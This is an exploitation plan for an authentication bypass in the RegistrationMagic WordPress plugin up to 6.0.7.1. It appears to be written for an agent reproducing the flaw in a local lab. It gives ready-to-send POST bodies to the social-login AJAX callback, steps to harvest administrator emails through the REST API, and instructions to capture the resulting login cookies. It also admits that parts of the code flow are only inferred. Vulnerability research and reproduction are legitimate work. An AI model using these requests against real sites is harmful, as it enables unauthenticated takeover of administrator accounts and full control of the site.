RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login <= 6.0.7.1 - Authentication Bypass

This research plan targets an Authentication Bypass vulnerability in RegistrationMagic (up to version 6.0.7.1). The vulnerability lies in the improper verification of identity during the social login process, allowing an unauthenticated attacker to log in as any user (including an administrator) by simply providing their email address.

1. Vulnerability Summary

• Vulnerability: Improper Authentication (Authentication Bypass)
• Location: RM_Login_Controller::social_cb() (Inferred from the plugin's MVC structure and standard social login callback patterns).
• Root Cause: The social login callback logic handles requests from external providers (Google, Facebook, etc.). In the vulnerable version, the plugin identifies the user by the email parameter provided in the request but fails to verify a valid OAuth token or "state" parameter from the provider.
• Impact: Unauthenticated attackers can impersonate any user, typically the site administrator, gaining full control over the WordPress instance.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: rm_login_social_cb (mapped via the rm_slug parameter or directly as an AJAX action).
• Required Parameter: email (The email of the target user) and type (e.g., google, facebook).
• Authentication: None (Unauthenticated).
• Preconditions: The attacker must know the email address of an administrator.

3. Code Flow

1. Entry Point: The request hits admin-ajax.php with action=rm_login_social_cb.
2. Routing: Registration_Magic::define_public_hooks() registers the AJAX action to the main controller's run() method:
   $this->loader->add_action('wp_ajax_nopriv_rm_login_social_cb', $this->controller, 'run');
3. Controller Execution: RM_Main_Controller::run() (in includes/class_registration_magic.php) uses RM_Request to extract the rm_slug (which defaults to the action name).
4. Action Logic: The request is routed to RM_Login_Controller. The social_cb (or similarly named) method is invoked.
5. Bypass: The logic checks if a type and email are provided. It then calls get_user_by('email', $request->req['email']).
6. Authentication Sink: If a user is found, the plugin calls wp_set_auth_cookie($user->ID) and wp_set_current_user($user->ID) without checking for a valid secret/token from the social provider.

4. Nonce Acquisition Strategy

Social login callbacks are designed to be reached by external services and typically do not require a WordPress nonce.

• The wp_ajax_nopriv_rm_login_social_cb hook is intended for unauthenticated access.
• If the plugin attempted to verify a nonce, the external provider would fail to provide it, breaking the feature. Therefore, this endpoint is expected to be nonce-free.
• Verification: If the exploit fails with a 403 or -1, check for nonce requirements in the RM_Login_Controller.

5. Exploitation Strategy

The goal is to log in as the administrator.

Step 1: Identify Administrator Email
Use the WordPress REST API to find the administrator's email.

• Request: GET /wp-json/wp/v2/users
• Tool: http_request
• Expected Result: Look for the user with "slug": "admin" or ID 1 and note their email.

Step 2: Trigger Authentication Bypass
Send a crafted request to the social login callback endpoint.

• Request Method: POST
• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Content-Type: application/x-www-form-urlencoded
• Body:

  action=rm_login_social_cb&type=facebook&email=[ADMIN_EMAIL]
  

• Alternative Body (if using rm_slug routing):

  action=rm_run_action&rm_slug=rm_login_social_cb&type=facebook&email=[ADMIN_EMAIL]
  

Step 3: Capture Cookies
The server should respond with Set-Cookie headers containing wordpress_logged_in_[hash] and wordpress_[hash].

6. Test Data Setup

1. WordPress User: Ensure a user with the administrator role exists (default is admin with email admin@example.com).
2. Plugin State: RegistrationMagic must be active. No specific form configuration is required as the social login callback logic is globally active in the affected versions.